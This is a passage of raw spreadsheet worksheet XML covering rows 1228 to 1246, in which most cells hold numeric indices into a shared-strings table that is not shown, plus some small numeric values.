      <c r="Y1228" s="12" t="s">
        <v>9176</v>
      </c>
    </row>
    <row r="1229" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1229" s="12">
        <v>6711</v>
      </c>
      <c r="B1229" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D1229" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E1229" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1229" s="12" t="s">
        <v>29728</v>
      </c>
      <c r="G1229" s="12" t="s">
        <v>9177</v>
      </c>
      <c r="H1229" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1229" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1229" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K1229" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1229" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1229" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1229" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1229" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1229" s="12" t="s">
        <v>9069</v>
      </c>
      <c r="Q1229" s="12" t="s">
        <v>28301</v>
      </c>
      <c r="R1229" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1229" s="12" t="s">
        <v>9178</v>
      </c>
      <c r="T1229" s="12" t="s">
        <v>9179</v>
      </c>
      <c r="U1229" s="12" t="s">
        <v>9180</v>
      </c>
      <c r="V1229" s="12" t="s">
        <v>4483</v>
      </c>
      <c r="W1229" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1229" s="12">
        <v>9</v>
      </c>
      <c r="Y1229" s="12" t="s">
        <v>9181</v>
      </c>
    </row>
    <row r="1230" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1230" s="12">
        <v>6712</v>
      </c>
      <c r="B1230" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1230" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1230" s="12" t="s">
        <v>29430</v>
      </c>
      <c r="G1230" s="12" t="s">
        <v>9182</v>
      </c>
      <c r="H1230" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1230" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1230" s="12" t="s">
        <v>347</v>
      </c>
      <c r="K1230" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1230" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1230" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1230" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1230" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1230" s="12" t="s">
        <v>9183</v>
      </c>
      <c r="Q1230" s="12" t="s">
        <v>28298</v>
      </c>
      <c r="R1230" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1230" s="12" t="s">
        <v>9184</v>
      </c>
      <c r="T1230" s="12" t="s">
        <v>9185</v>
      </c>
      <c r="U1230" s="12" t="s">
        <v>9186</v>
      </c>
      <c r="V1230" s="12" t="s">
        <v>3399</v>
      </c>
      <c r="W1230" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1230" s="12">
        <v>33</v>
      </c>
      <c r="Y1230" s="12" t="s">
        <v>9187</v>
      </c>
    </row>
    <row r="1231" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1231" s="12">
        <v>6720</v>
      </c>
      <c r="B1231" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1231" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1231" s="12" t="s">
        <v>31439</v>
      </c>
      <c r="F1231" s="12" t="s">
        <v>29432</v>
      </c>
      <c r="G1231" s="12" t="s">
        <v>9188</v>
      </c>
      <c r="H1231" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1231" s="12" t="s">
        <v>22</v>
      </c>
      <c r="J1231" s="12" t="s">
        <v>1724</v>
      </c>
      <c r="K1231" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1231" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1231" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1231" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1231" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1231" s="12" t="s">
        <v>9069</v>
      </c>
      <c r="Q1231" s="12" t="s">
        <v>28301</v>
      </c>
      <c r="R1231" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1231" s="12" t="s">
        <v>9189</v>
      </c>
      <c r="T1231" s="12" t="s">
        <v>9190</v>
      </c>
      <c r="U1231" s="12" t="s">
        <v>9191</v>
      </c>
      <c r="V1231" s="12" t="s">
        <v>4769</v>
      </c>
      <c r="W1231" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1231" s="12">
        <v>9</v>
      </c>
      <c r="Y1231" s="12" t="s">
        <v>9192</v>
      </c>
    </row>
    <row r="1232" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1232" s="12">
        <v>6728</v>
      </c>
      <c r="B1232" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1232" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1232" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1232" s="12" t="s">
        <v>29433</v>
      </c>
      <c r="G1232" s="12" t="s">
        <v>9197</v>
      </c>
      <c r="H1232" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1232" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1232" s="12" t="s">
        <v>368</v>
      </c>
      <c r="K1232" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1232" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1232" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1232" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1232" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1232" s="12" t="s">
        <v>9198</v>
      </c>
      <c r="Q1232" s="12" t="s">
        <v>28301</v>
      </c>
      <c r="R1232" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1232" s="12" t="s">
        <v>9199</v>
      </c>
      <c r="T1232" s="12" t="s">
        <v>8882</v>
      </c>
      <c r="U1232" s="12" t="s">
        <v>9200</v>
      </c>
      <c r="V1232" s="12" t="s">
        <v>4727</v>
      </c>
      <c r="W1232" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1232" s="12">
        <v>4</v>
      </c>
      <c r="Y1232" s="12" t="s">
        <v>9201</v>
      </c>
    </row>
    <row r="1233" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1233" s="12">
        <v>6736</v>
      </c>
      <c r="B1233" s="12" t="s">
        <v>29425</v>
      </c>
      <c r="C1233" s="12" t="s">
        <v>28414</v>
      </c>
      <c r="D1233" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1233" s="12" t="s">
        <v>29434</v>
      </c>
      <c r="G1233" s="12" t="s">
        <v>9202</v>
      </c>
      <c r="H1233" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1233" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1233" s="12" t="s">
        <v>422</v>
      </c>
      <c r="K1233" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1233" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1233" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1233" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1233" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1233" s="12" t="s">
        <v>9203</v>
      </c>
      <c r="Q1233" s="12" t="s">
        <v>28301</v>
      </c>
      <c r="R1233" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1233" s="12" t="s">
        <v>9204</v>
      </c>
      <c r="T1233" s="12" t="s">
        <v>660</v>
      </c>
      <c r="U1233" s="12" t="s">
        <v>9205</v>
      </c>
      <c r="V1233" s="12" t="s">
        <v>7231</v>
      </c>
      <c r="W1233" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1233" s="12">
        <v>5</v>
      </c>
      <c r="Y1233" s="12" t="s">
        <v>9206</v>
      </c>
    </row>
    <row r="1234" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1234" s="12">
        <v>6747</v>
      </c>
      <c r="B1234" s="12" t="s">
        <v>29425</v>
      </c>
      <c r="C1234" s="12" t="s">
        <v>28406</v>
      </c>
      <c r="D1234" s="12" t="s">
        <v>29435</v>
      </c>
      <c r="E1234" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1234" s="12" t="s">
        <v>29432</v>
      </c>
      <c r="G1234" s="12" t="s">
        <v>9213</v>
      </c>
      <c r="H1234" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1234" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1234" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K1234" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1234" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M1234" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N1234" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O1234" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1234" s="12" t="s">
        <v>9214</v>
      </c>
      <c r="Q1234" s="12" t="s">
        <v>28301</v>
      </c>
      <c r="R1234" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1234" s="12" t="s">
        <v>9215</v>
      </c>
      <c r="T1234" s="12" t="s">
        <v>9216</v>
      </c>
      <c r="U1234" s="12" t="s">
        <v>9217</v>
      </c>
      <c r="V1234" s="12" t="s">
        <v>2992</v>
      </c>
      <c r="W1234" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1234" s="12">
        <v>53</v>
      </c>
      <c r="Y1234" s="12" t="s">
        <v>9218</v>
      </c>
    </row>
    <row r="1235" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1235" s="12">
        <v>6752</v>
      </c>
      <c r="B1235" s="12" t="s">
        <v>29436</v>
      </c>
      <c r="C1235" s="12" t="s">
        <v>28391</v>
      </c>
      <c r="D1235" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1235" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1235" s="12" t="s">
        <v>29437</v>
      </c>
      <c r="G1235" s="12" t="s">
        <v>9220</v>
      </c>
      <c r="H1235" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1235" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1235" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K1235" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1235" s="12" t="s">
        <v>33</v>
      </c>
      <c r="M1235" s="12" t="s">
        <v>31585</v>
      </c>
      <c r="N1235" s="12" t="s">
        <v>31595</v>
      </c>
      <c r="O1235" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1235" s="12" t="s">
        <v>9069</v>
      </c>
      <c r="Q1235" s="12" t="s">
        <v>28301</v>
      </c>
      <c r="R1235" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1235" s="12" t="s">
        <v>9221</v>
      </c>
      <c r="T1235" s="12" t="s">
        <v>3192</v>
      </c>
      <c r="U1235" s="12" t="s">
        <v>9222</v>
      </c>
      <c r="V1235" s="12" t="s">
        <v>5111</v>
      </c>
      <c r="W1235" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1235" s="12">
        <v>56</v>
      </c>
      <c r="Y1235" s="12" t="s">
        <v>9223</v>
      </c>
    </row>
    <row r="1236" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1236" s="12">
        <v>6754</v>
      </c>
      <c r="B1236" s="12" t="s">
        <v>29436</v>
      </c>
      <c r="C1236" s="12" t="s">
        <v>29781</v>
      </c>
      <c r="D1236" s="12" t="s">
        <v>29434</v>
      </c>
      <c r="F1236" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1236" s="12" t="s">
        <v>9229</v>
      </c>
      <c r="H1236" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1236" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1236" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K1236" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1236" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1236" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1236" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1236" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1236" s="12" t="s">
        <v>9230</v>
      </c>
      <c r="Q1236" s="12" t="s">
        <v>28301</v>
      </c>
      <c r="R1236" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1236" s="12" t="s">
        <v>9231</v>
      </c>
      <c r="T1236" s="12" t="s">
        <v>9065</v>
      </c>
      <c r="U1236" s="12" t="s">
        <v>5120</v>
      </c>
      <c r="V1236" s="12" t="s">
        <v>4773</v>
      </c>
      <c r="W1236" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1236" s="12">
        <v>12</v>
      </c>
      <c r="Y1236" s="12" t="s">
        <v>9232</v>
      </c>
    </row>
    <row r="1237" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1237" s="12">
        <v>6757</v>
      </c>
      <c r="B1237" s="12" t="s">
        <v>29436</v>
      </c>
      <c r="C1237" s="12" t="s">
        <v>29439</v>
      </c>
      <c r="D1237" s="12" t="s">
        <v>29431</v>
      </c>
      <c r="E1237" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1237" s="12" t="s">
        <v>29429</v>
      </c>
      <c r="G1237" s="12" t="s">
        <v>9233</v>
      </c>
      <c r="H1237" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1237" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1237" s="12" t="s">
        <v>2023</v>
      </c>
      <c r="K1237" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1237" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1237" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1237" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1237" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1237" s="12" t="s">
        <v>9203</v>
      </c>
      <c r="Q1237" s="12" t="s">
        <v>28301</v>
      </c>
      <c r="R1237" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1237" s="12" t="s">
        <v>9234</v>
      </c>
      <c r="T1237" s="12" t="s">
        <v>7227</v>
      </c>
      <c r="U1237" s="12" t="s">
        <v>9235</v>
      </c>
      <c r="V1237" s="12" t="s">
        <v>2027</v>
      </c>
      <c r="W1237" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1237" s="12">
        <v>12</v>
      </c>
      <c r="Y1237" s="12" t="s">
        <v>9236</v>
      </c>
    </row>
    <row r="1238" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1238" s="12">
        <v>6761</v>
      </c>
      <c r="B1238" s="12" t="s">
        <v>29440</v>
      </c>
      <c r="D1238" s="12" t="s">
        <v>29429</v>
      </c>
      <c r="E1238" s="12" t="s">
        <v>31454</v>
      </c>
      <c r="F1238" s="12" t="s">
        <v>29441</v>
      </c>
      <c r="G1238" s="12" t="s">
        <v>9237</v>
      </c>
      <c r="H1238" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1238" s="12" t="s">
        <v>152</v>
      </c>
      <c r="J1238" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1238" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1238" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1238" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1238" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1238" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1238" s="12" t="s">
        <v>9069</v>
      </c>
      <c r="Q1238" s="12" t="s">
        <v>28301</v>
      </c>
      <c r="R1238" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1238" s="12" t="s">
        <v>9238</v>
      </c>
      <c r="T1238" s="12" t="s">
        <v>9239</v>
      </c>
      <c r="U1238" s="12" t="s">
        <v>9240</v>
      </c>
      <c r="V1238" s="12" t="s">
        <v>299</v>
      </c>
      <c r="W1238" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1238" s="12">
        <v>14</v>
      </c>
      <c r="Y1238" s="12" t="s">
        <v>9241</v>
      </c>
    </row>
    <row r="1239" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1239" s="12">
        <v>6771</v>
      </c>
      <c r="B1239" s="12" t="s">
        <v>29440</v>
      </c>
      <c r="D1239" s="12" t="s">
        <v>29437</v>
      </c>
      <c r="E1239" s="12" t="s">
        <v>31435</v>
      </c>
      <c r="F1239" s="12" t="s">
        <v>29442</v>
      </c>
      <c r="G1239" s="12" t="s">
        <v>9251</v>
      </c>
      <c r="H1239" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1239" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1239" s="12" t="s">
        <v>368</v>
      </c>
      <c r="K1239" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1239" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1239" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1239" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1239" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1239" s="12" t="s">
        <v>9069</v>
      </c>
      <c r="Q1239" s="12" t="s">
        <v>28301</v>
      </c>
      <c r="R1239" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1239" s="12" t="s">
        <v>9252</v>
      </c>
      <c r="T1239" s="12" t="s">
        <v>9239</v>
      </c>
      <c r="U1239" s="12" t="s">
        <v>9253</v>
      </c>
      <c r="V1239" s="12" t="s">
        <v>2091</v>
      </c>
      <c r="W1239" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1239" s="12">
        <v>4</v>
      </c>
      <c r="Y1239" s="12" t="s">
        <v>9254</v>
      </c>
    </row>
    <row r="1240" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1240" s="12">
        <v>6772</v>
      </c>
      <c r="B1240" s="12" t="s">
        <v>29440</v>
      </c>
      <c r="D1240" s="12" t="s">
        <v>29443</v>
      </c>
      <c r="F1240" s="12" t="s">
        <v>29434</v>
      </c>
      <c r="G1240" s="12" t="s">
        <v>9255</v>
      </c>
      <c r="H1240" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1240" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J1240" s="12" t="s">
        <v>2023</v>
      </c>
      <c r="K1240" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1240" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1240" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1240" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1240" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1240" s="12" t="s">
        <v>9069</v>
      </c>
      <c r="Q1240" s="12" t="s">
        <v>28301</v>
      </c>
      <c r="R1240" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1240" s="12" t="s">
        <v>9256</v>
      </c>
      <c r="T1240" s="12" t="s">
        <v>9239</v>
      </c>
      <c r="U1240" s="12" t="s">
        <v>9257</v>
      </c>
      <c r="V1240" s="12" t="s">
        <v>2027</v>
      </c>
      <c r="W1240" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1240" s="12">
        <v>3</v>
      </c>
      <c r="Y1240" s="12" t="s">
        <v>9258</v>
      </c>
    </row>
    <row r="1241" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1241" s="12">
        <v>6787</v>
      </c>
      <c r="B1241" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1241" s="12" t="s">
        <v>29444</v>
      </c>
      <c r="E1241" s="12" t="s">
        <v>31454</v>
      </c>
      <c r="F1241" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1241" s="12" t="s">
        <v>9259</v>
      </c>
      <c r="H1241" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1241" s="12" t="s">
        <v>1460</v>
      </c>
      <c r="J1241" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K1241" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1241" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1241" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1241" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1241" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1241" s="12" t="s">
        <v>9260</v>
      </c>
      <c r="Q1241" s="12" t="s">
        <v>28301</v>
      </c>
      <c r="R1241" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1241" s="12" t="s">
        <v>9261</v>
      </c>
      <c r="T1241" s="12" t="s">
        <v>9262</v>
      </c>
      <c r="U1241" s="12" t="s">
        <v>9263</v>
      </c>
      <c r="V1241" s="12" t="s">
        <v>2379</v>
      </c>
      <c r="W1241" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1241" s="12">
        <v>6</v>
      </c>
      <c r="Y1241" s="12" t="s">
        <v>9264</v>
      </c>
    </row>
    <row r="1242" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1242" s="12">
        <v>6795</v>
      </c>
      <c r="B1242" s="12" t="s">
        <v>29445</v>
      </c>
      <c r="D1242" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F1242" s="12" t="s">
        <v>29446</v>
      </c>
      <c r="G1242" s="12" t="s">
        <v>9265</v>
      </c>
      <c r="H1242" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1242" s="12" t="s">
        <v>145</v>
      </c>
      <c r="J1242" s="12" t="s">
        <v>941</v>
      </c>
      <c r="K1242" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1242" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1242" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1242" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1242" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1242" s="12" t="s">
        <v>9260</v>
      </c>
      <c r="Q1242" s="12" t="s">
        <v>28301</v>
      </c>
      <c r="R1242" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1242" s="12" t="s">
        <v>9266</v>
      </c>
      <c r="T1242" s="12" t="s">
        <v>8882</v>
      </c>
      <c r="U1242" s="12" t="s">
        <v>8754</v>
      </c>
      <c r="V1242" s="12" t="s">
        <v>222</v>
      </c>
      <c r="W1242" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1242" s="12">
        <v>2</v>
      </c>
      <c r="Y1242" s="12" t="s">
        <v>9267</v>
      </c>
    </row>
    <row r="1243" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1243" s="12">
        <v>6801</v>
      </c>
      <c r="B1243" s="12" t="s">
        <v>29447</v>
      </c>
      <c r="D1243" s="12" t="s">
        <v>29444</v>
      </c>
      <c r="E1243" s="12" t="s">
        <v>31432</v>
      </c>
      <c r="F1243" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="G1243" s="12" t="s">
        <v>9270</v>
      </c>
      <c r="H1243" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1243" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1243" s="12" t="s">
        <v>356</v>
      </c>
      <c r="K1243" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1243" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1243" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1243" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1243" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1243" s="12" t="s">
        <v>9271</v>
      </c>
      <c r="Q1243" s="12" t="s">
        <v>28301</v>
      </c>
      <c r="R1243" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1243" s="12" t="s">
        <v>9272</v>
      </c>
      <c r="T1243" s="12" t="s">
        <v>9273</v>
      </c>
      <c r="U1243" s="12" t="s">
        <v>9274</v>
      </c>
      <c r="V1243" s="12" t="s">
        <v>7254</v>
      </c>
      <c r="W1243" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1243" s="12">
        <v>18</v>
      </c>
      <c r="Y1243" s="12" t="s">
        <v>9275</v>
      </c>
    </row>
    <row r="1244" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1244" s="12">
        <v>6810</v>
      </c>
      <c r="B1244" s="12" t="s">
        <v>29448</v>
      </c>
      <c r="D1244" s="12" t="s">
        <v>29429</v>
      </c>
      <c r="E1244" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F1244" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G1244" s="12" t="s">
        <v>9276</v>
      </c>
      <c r="H1244" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1244" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J1244" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K1244" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1244" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M1244" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N1244" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O1244" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1244" s="12" t="s">
        <v>9268</v>
      </c>
      <c r="Q1244" s="12" t="s">
        <v>28302</v>
      </c>
      <c r="R1244" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1244" s="12" t="s">
        <v>9277</v>
      </c>
      <c r="T1244" s="12" t="s">
        <v>2992</v>
      </c>
      <c r="U1244" s="12" t="s">
        <v>7212</v>
      </c>
      <c r="V1244" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W1244" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1244" s="12">
        <v>9</v>
      </c>
      <c r="Y1244" s="12" t="s">
        <v>9278</v>
      </c>
    </row>
    <row r="1245" spans="1:25" ht="15.5" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1245" s="12">
        <v>6817</v>
      </c>
      <c r="B1245" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D1245" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E1245" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F1245" s="12" t="s">
        <v>29449</v>
      </c>
      <c r="G1245" s="12" t="s">
        <v>9279</v>
      </c>
      <c r="H1245" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1245" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J1245" s="12" t="s">
        <v>44</v>
      </c>
      <c r="K1245" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1245" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1245" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1245" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1245" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1245" s="12" t="s">
        <v>9203</v>
      </c>
      <c r="Q1245" s="12" t="s">
        <v>28301</v>
      </c>
      <c r="R1245" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1245" s="12" t="s">
        <v>9280</v>
      </c>
      <c r="T1245" s="12" t="s">
        <v>9281</v>
      </c>
      <c r="U1245" s="12" t="s">
        <v>9282</v>
      </c>
      <c r="V1245" s="12" t="s">
        <v>2992</v>
      </c>
      <c r="W1245" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1245" s="12">
        <v>34</v>
      </c>
      <c r="Y1245" s="12" t="s">
        <v>9283</v>
      </c>
    </row>
    <row r="1246" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1246" s="12">
        <v>6831</v>
      </c>
      <c r="B1246" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C1246" s="12" t="s">
        <v>29450</v>
      </c>
      <c r="D1246" s="12" t="s">
        <v>29429</v>
      </c>
      <c r="E1246" s="12" t="s">
        <v>31436</v>
      </c>
      <c r="F1246" s="12" t="s">
        <v>29446</v>
      </c>
      <c r="G1246" s="12" t="s">
        <v>9295</v>
      </c>
      <c r="H1246" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I1246" s="12" t="s">
        <v>13</v>
      </c>
      <c r="J1246" s="12" t="s">
        <v>1589</v>
      </c>
      <c r="K1246" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L1246" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M1246" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N1246" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O1246" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P1246" s="12" t="s">
        <v>9296</v>
      </c>
      <c r="Q1246" s="12">
        <v>2.6</v>
      </c>
      <c r="R1246" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S1246" s="12" t="s">
        <v>9297</v>
      </c>
      <c r="T1246" s="12" t="s">
        <v>9298</v>
      </c>
      <c r="U1246" s="12" t="s">
        <v>9299</v>
      </c>
      <c r="V1246" s="12" t="s">
        <v>9300</v>
      </c>
      <c r="W1246" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X1246" s="12">
        <v>11</v>
      </c>
      <c r="Y1246" s="12" t="s">
        <v>9301</v>
      </c>
    </row>
    <row r="1247" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A1247" s="12">
